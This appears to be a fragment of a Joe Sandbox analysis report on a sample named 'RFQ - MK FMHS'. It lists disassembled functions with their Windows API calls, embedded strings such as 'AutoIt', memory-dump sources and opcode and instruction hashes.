                    • Opcode Fuzzy Hash: 9aad6fb609b4529043c5206580fc6072b81418aec040dc691c63ad92315084ef
                    • Instruction Fuzzy Hash: 0201D871B41104BBCB18E7A0DA97EFF73E8DF05300F141019B95673192EA515F0D9262
                    Function 00EC9264 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E77F41: _memmove.LIBCMT ref: 00E77F82
                      • Part of subcall function 00ECB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00ECB0E7
                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 00EC92D0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ClassMessageNameSend_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 372448540-1403004172
                    • Opcode ID: 9f5236ff90ce3d07491db8c9c530133a70d0bb2fd59a9c42d65b4527d271dc69
                    • Instruction ID: 774fcfefd115aabe7ccf93adfced9bd64e539d14a0a1dae58d8fd01e4474e9e7
                    • Opcode Fuzzy Hash: 9f5236ff90ce3d07491db8c9c530133a70d0bb2fd59a9c42d65b4527d271dc69
                    • Instruction Fuzzy Hash: 5101A772A4510477CB18E6A0DA87EFF77EC9F11300F246119B85673192DA525F0D9272
                    Function 00ED51CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ClassName_wcscmp
                    • String ID: #32770
                    • API String ID: 2292705959-463685578
                    • Opcode ID: 39b0c138df0cc53d32bda067fd43bc559f264a03e4efdc43f16d75e7a23318c6
                    • Instruction ID: 7e215e0072ce593a6c3d4f73fd19735cc5712508706492544e3214a389bdb52a
                    • Opcode Fuzzy Hash: 39b0c138df0cc53d32bda067fd43bc559f264a03e4efdc43f16d75e7a23318c6
                    • Instruction Fuzzy Hash: 86E09B7250432D5BD720AA99AC45AA7F7ACEB45771F000157F914E3150D560994587D1
                    Function 00EC81BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                    Download Yara Rule
                    APIs
                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00EC81CA
                      • Part of subcall function 00E93598: _doexit.LIBCMT ref: 00E935A2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Message_doexit
                    • String ID: AutoIt$Error allocating memory.
                    • API String ID: 1993061046-4017498283
                    • Opcode ID: 859177108b15bb82a4f9e688ff0a62f9e2fdc008d65b4c2e3cf98fd4e559d537
                    • Instruction ID: e9eabe7a518316a1fa04a605c791a4bfbf84cc151ee41289832b74995047b759
                    • Opcode Fuzzy Hash: 859177108b15bb82a4f9e688ff0a62f9e2fdc008d65b4c2e3cf98fd4e559d537
                    • Instruction Fuzzy Hash: 1ED012323C531836D61432A56D06FC576C84B05B55F549015BB08B55D38ED6D98292DE
                    Function 00EAB511 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00EAB564: _memset.LIBCMT ref: 00EAB571
                      • Part of subcall function 00E90B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00EAB540,?,?,?,00E7100A), ref: 00E90B89
                    • IsDebuggerPresent.KERNEL32(?,?,?,00E7100A), ref: 00EAB544
                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00E7100A), ref: 00EAB553
                    Strings
                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00EAB54E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                    • API String ID: 3158253471-631824599
                    • Opcode ID: a8ca204651c4726d77a7ec6e0baadfd8959b9f4a646115f3a47e3c72435874c9
                    • Instruction ID: 26bb2b720dde5b6a93a2eb7a3209c4fa92a34538d06b15c6b22f0ed81587be77
                    • Opcode Fuzzy Hash: a8ca204651c4726d77a7ec6e0baadfd8959b9f4a646115f3a47e3c72435874c9
                    • Instruction Fuzzy Hash: 4EE09270600310CFD760DF69E4043827BE4AF04714F04C96CE486E7362EBB4E448CB61
                    Function 00EF5BEB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                    Download Yara Rule
                    APIs
                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00EF5BF5
                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00EF5C08
                      • Part of subcall function 00ED54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00ED555E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: FindMessagePostSleepWindow
                    • String ID: Shell_TrayWnd
                    • API String ID: 529655941-2988720461
                    • Opcode ID: 6f3dcbf021b500f03856540ff37e4c497780c12d16ce990deb1909e32c479dd7
                    • Instruction ID: 572c284a5cb40fa9d1c3e67d526b74d91ccbc41531b050f7abd80919048ab655
                    • Opcode Fuzzy Hash: 6f3dcbf021b500f03856540ff37e4c497780c12d16ce990deb1909e32c479dd7
                    • Instruction Fuzzy Hash: ADD0C932388311BBE774AB71AC1BFA76A54AF40B61F110825B656BA2D0D9E49805C651